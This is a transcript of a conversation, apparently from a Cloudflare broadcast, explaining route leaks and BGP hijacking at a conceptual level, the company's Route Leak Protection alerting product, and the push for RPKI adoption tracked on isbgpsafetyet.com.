Everyone's going to honk their horns and be really upset about it, but there's really nothing anybody can do because that's just how the road was designed.
The road wasn't designed to handle five lanes of traffic, it was designed to handle one, and all of a sudden there's just a choke point.
That's what happened, but really there was no innocuous, like there was really no malicious intent there.
It was just, I'm deploying a new thing, it was misconfigured and we caused an outage.
It happens, right?
That happens on the Internet all the time. But there is a similar flavor of this called BGP hijacking that actually is very malicious and it's very much intended.
And the problem really arises when, because you can announce more specific routes, if somebody, if a malicious actor wanted to steal your cryptocurrency, what they could do is they could look at Coinbase's advertisements and say, well, they're announcing a slash 22.
So why don't I announce a subnet of that, a slash 24, and then build something that looks almost exactly like Coinbase, and then they will be redirected there or users will be redirected there.
They enter their username and password and all of a sudden, boom, the attacker now has private information.
And basically a BGP hijack by itself doesn't actually cause any harm, but a BGP hijack combined with other attacks basically makes it very easy for customers to get, or for attackers to get access to data by basically making it, by basically abusing how the Internet is supposed to work, right?
The Internet relies on trust and if you've got a malicious actor, you don't have trust anymore.
But BGP is currently not, or BGP as it stands on its own, is not designed to handle malicious actors.
It just assumes that everyone's doing the right thing.
So obviously these issues can cause a lot of pain for our customers, right?
Especially for Cloudflare, who onboards customers through Magic Transit, and Magic Transit and UIYP, they're buying a security product.
And if we're not doing our part to help secure the routes and the paths that their customers traverse to get to us, then that's a very big hole.
So the thing that we've designed, Route Leak Protection, and we've released today, basically allows customers to be informed when their prefixes are being leaked or potentially being hijacked.
And what this allows them to do is get out the knowledge and inform their customers, or inform their users, as soon as humanly possible, hey, we've been compromised.
You need to be careful about the sites that you're going on.
You need to make sure that if you're using these subnets, or if you're connecting to sites hosted on these subnets, that you're aware that there may be a potential attack going on.
And part of the problem, I'm sorry I'm going on, is that route leaks are not something that can be mitigated by Cloudflare, right?
Cloudflare is advertising the prefixes, but it takes these providers to honor the advertisement.
And so really what has to be done when you do this is you go and tell these providers, hey, you're honoring a prefix that we aren't actually, that's not being advertised, that's not like authorized to advertise it.
So you need to stop doing that. And that's really how route leaks get solved at the end of the day.
And that's a very tedious process, right?
But the sooner that you can kick off that process, the faster you have to detect, the shorter the impact is.
Great. That was a great answer. Really helpful. Lots on back there.
I want to drill into a couple of particular areas. So you mentioned 21, 20, et cetera.
Can you just explain what that is briefly? And then also the attack that we saw, right, that I think that really scared us was Amazon had their Route 53 DNS, right?
And Route 53 is their DNS offering that will tell you where to find these sites, right?
So it wasn't Coinbase, it was some other, I think, crypto provider in that particular case.
And they were trying to, and keep me honest here, they were trying to serve a different IP address back so that they could take that traffic from the client.
Is that right? Yes. So to answer your first question, so slash 23, slash 21, all of that stuff are basically subnets.
IP addresses are aggregated by eight bits in the, sorry, 32 bits per segment.
And so they're just grouped by slash 32 is the bits.
And so basically a slash 32 is one IP, and slash 24 is 256 IPs.
And that is, a slash 24 is the minimal set amount of IPs that is Internet routable.
So you can't actually advertise slash 25s on the Internet.
Well, you can, but BGP is, again, BGP is inherently insecure. So the guidance is just don't do that, but it can happen.
But going back to kind of the MyEtherWallet and the Amazon 53 problem, yes, that's exactly what we're concerned about.
Like we're concerned about man in the middle. We're concerned about, you know, kind of making it very, right now it's pretty easy for a customer or for an attacker to imitate somebody who's legit, whether through hijacking, you know, DNS prefixes or hijacking, you know, a customer prefixes and basically saying, hey, you know, I'm, you know, magic transit customer A, but like, I'm actually not, but like enter your personal information to me and, you know, just see what happens.
It's interesting how a lot of users just inherently trust that the Internet is taking them to the right place.
Yeah. I mean, I think the nice thing there is that there's a layered approach to security, right?
So we've got the concept of the web PKI.
And so if somebody is pretending to be MyEtherWallet, right, then, you know, the browser, if, you know, Chrome has done a lot of great work here and Firefox and others to advance the, you know, this site is serving you an SSL certificate that, you know, either didn't show up in a certificate transparency log or is not actually issued and trusted by the browser, right?
And so you may get somewhere in a network perspective, but if you don't have that cryptographic proof that the server is authenticating as a domain, there's layers of protection there.
So just got a couple minutes left. I think that the thing that I'd like to understand and have you describe, and you mentioned this in your post is, so we're doing a lot of detection, right?
So we're saying, hey, this is happening, you should act, but what is the longer term path?
And then we've been, you know, pushing this isbgpsafetyet.com and we've been, you know, browbeating providers in a sense to deploy this onto their network, to make the network more secure.
Like, can you explain what that is? And we've got about a minute left here and then we go.
Sure. I'll be brief, which is hard. At a very high level, the act of going around and telling providers, hey, this person is not authorized to advertise these routes is automated.
There is a system for this. It's called RPKI.
And RPKI basically allows customers to sign their routes and basically say, I am the only person who's allowed to advertise this.
Providers need to be able to honor these signings and these certificates.
And RPKI and deploying that allows them to be able to do that.
So if you're a customer who's deployed RPKI and you should deploy RPKI, we highly recommend that you push customers or push transit providers who haven't deployed RPKI yet to do so.
Really the only way that the Internet is going to become safer is if every single one of these providers do that.
And isbgpsafetyet is a really good way of tracking who's deployed RPKI or not.
We've had some good improvements over the past quarter. And now we're at kind of over 50% of the largest Internet providers on the Internet cloud and transit and ISP combined are deploying RPKI.
So we're making good progress, but you know, there's still a lot of room to go.
Terrific. We're out of time here. Thank you so much to everyone that joined today.
Really interesting conversation. Appreciate it.
And excited to see how people start using this.